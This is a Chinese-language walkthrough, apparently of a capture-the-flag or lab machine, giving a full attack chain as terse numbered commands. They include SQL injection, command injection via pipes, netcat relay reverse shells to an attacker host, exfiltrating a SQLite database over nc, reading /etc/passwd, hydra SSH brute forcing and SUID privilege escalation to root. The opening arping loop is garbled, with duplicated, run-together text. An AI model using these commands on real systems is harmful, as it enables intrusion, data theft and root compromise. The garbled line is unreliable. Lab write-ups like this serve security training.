1.首先进行内网侦探
for i in ( s e q 1254 ) ; d o a r p i n g − c 210.0.2. (seq 1 254); do arping -c 2 10.0.2. (seq1254);doarping−c210.0.2.i; done
2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过
特殊符号爆出数据库语句后用数据库语句来探针
3.“or 1=1 --+ 查看到后台页面 输入文件名会发生送到服务端进行检测
4.用第二个思路,考虑到可能会存在扫描文件的命令(avscan hello),所以可以用命令执行漏洞
在后面加上管道符来进行探测 which nc 发现/bin/bash下存在nc这一命令
5.侦听4444端口 通过连接获得shell nc 10.0.2.4 4444 -e /bin/bash -e的参数的作用是执行成功之后运行shell,发现
由于版本原因nc的-e参数并不存在,放弃-e思路
6.nc 10.0.2.4 3333 | /bin/bash | nc 10.0.2.4 4444 nc串联攻击
7.file database.sql 查看文件属性发现是sqlite
8.在kali本机上开启另外一个侦听 将接收到的文件储存为db.sql
nc -nvlp 5555 > db.sql
9.在侦听的3333端口上传输文件见nc 10.0.2.4 < datatbase.sql
10.在kali本机上执行sqlite3 执行open命令打开文件
.open db.sql
.database 查看当前加载的数据库文件
.dump 显示数据库文件
11.3333端口上查看密码文件 cat /etc/passwd |grep /bin/bash 查看
可以通过shell登陆的账号
12.在kali本机上编辑账号和密码字典 用hydra进行爆破
hydra -L user.txt _p pass.txt ssh://10.0.2.7 发现攻击失败 没有得到账号密码
13.挨个用ls查看每个文件夹下的文件 找寻可以提权的目标
ls -l 发现 其中一个名为update_cloudav的文件 权限为rwsr 即存在suid权限
./update_cloudav “a | nc 10.0.2.4 5555 | /bin/bash |nc 10.0.2.4 6666” 进行suid
权限继承
14.输入id得到root权限